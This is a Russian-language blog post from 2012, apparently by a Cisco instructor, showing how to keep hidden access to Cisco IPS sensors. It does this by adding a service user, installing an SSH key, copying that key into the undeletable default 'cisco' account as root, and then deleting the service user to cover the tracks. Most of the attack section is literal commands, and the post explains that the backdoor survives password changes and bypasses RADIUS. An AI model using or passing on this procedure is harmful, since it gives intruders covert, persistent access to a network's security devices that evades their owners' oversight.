antiCisco blogs


блоги по технологиям и оборудованию cisco от инструкторов

Опубликовано 12 Январь , 2012

В этой статье я хочу рассказать о том как можно обмануть систему аутентификации на Cisco IPS (IPS 4200 и AIP-SSM). Статья не претендует на то, что мы осуществляем полноценный взлом устройства, нам все-таки необходимо выполнить ряд предварительных действий.

Предыстория

Все мы знаем о том, что когда мы достаем новенький  Cisco IPS из коробки в системе уже есть пользователь cisco/cisco для первоначальной конфигурации устройства. К слову сказать, удалить данного пользователя нельзя, можно только менять пароль и группу пользователей к которой он принадлежит.

На Cisco IPS при добавлении нового пользователя мы должны определить группу к которой он относится: Administrator, Operaror, Viewer, Service. Ниже приведен синтаксис команды для добавления нового пользователя:

sensor# username <username> password <password> privilege <privilege group>

О группе Service хотелось бы рассказать подробнее, она необходима для исправления разного рода косяков в системе непосредственно через оболочку Linux  — Bash. Мало того при добавление пользователя в такую группу есть еще пару нюансов:

  1. В системе такой пользователь может быть только один (это правда если вы добавляете такого пользователя через Shell IPS или Cisco IME)
  2. Пароль данного пользователя заменяет пароль пользователя root в системе

Готовим backdor

Добавляем сервисного пользователя:

sensor# username service password ser123vice privilege service

На локальной машине генерируем пару ключей (приватный/публичный) для SSH:

zsh# ssh-keygen -t rsa

Копируем наш ключ на Cisco IPS

zsh# scp ~/.ssh/id_rsa.pub service@192.168.0.2:/home/service/.ssh

Заходим на Cisco IPS по протоколу SSH и настраиваем аутентификацию по ключам:

zsh# ssh service@192.168.0.2
-bash-2.05b$ cd .ssh
-bash-2.05b$ cat id_rsa.pub > authorized_keys

Пробуем подключиться с локальной машины по SSH с использованием аутентификации по ключам:

zsh# ssh service@192.168.0.1
-bash-2.05b$

Пробуем получить доступ к Cisco IPS Shell:

-bash-2.05b$ /usr/cids/idsRoot/bin/cidcli
sensor#

И так мы добились того, что даже в случае того, что для пользователя service изменят пароль то мы все равно сможем попасть на устройство (мы же используем ключи). Но есть еще один нюанс, если мы захотим изменить группу пользователя через Cisco IPS shell или Cisco IME то получим сообщение об ошибке, потому что нельзя просто изменить группу для пользователя в группе Service, его нужно удалить и создать заново. При удалении пользователя удалиться каталог /home/service и мы потеряем все, что настраивали выше!

Едем дальше

Вы еще помните о том, что пользователя cisco нельзя удалить ? Давайте этим воспользуемся, для этого на Cisco IPS выполним:

-bash-2.05b$ su root
Password:
bash-2.05b# cp /home/service/.ssh/authorized_keys /home/cisco/.ssh/
bash-2.05b# chown service:cids /home/cisco/.ssh/authorized_keys

Теперь пробуем зайти на Cisco IPS из под пользователя cisco с использованием ключей:

ssh cisco@10.16.251.4
sensor#

Ура! Теперь мы точно всех обманули, остается замести следы. Удаляем пользователя service.

sensor# conf t
sensor(config)# no username service

Итог

При наличии IP доступа к устройству мы всегда сможем на него зайти, если даже на нем будет изменен пароль. Напоминаю, что удалить пользователя cisco нельзя (средствами Cisco IPS shell и Cisco IME).

Замечу, что на Cisco IPS для аутентификации можно использовать RADIUS, но вся фитча в том, что по RADIUS будет осуществляться проверка только если по SSH вы заходите по логину/паролю, а вот по ключам по прежнему будет сверяться с локальной базой.

ps

Ранее статья была опубликована мной на Хабрахабре, указываю ссылку на ресурс, она обязательна (иначе НЛО меня накажет).

 

Опубликовано: Безопасность cisco

 

» Оставить комментарий

Вы должны войти чтобы прокомментировать.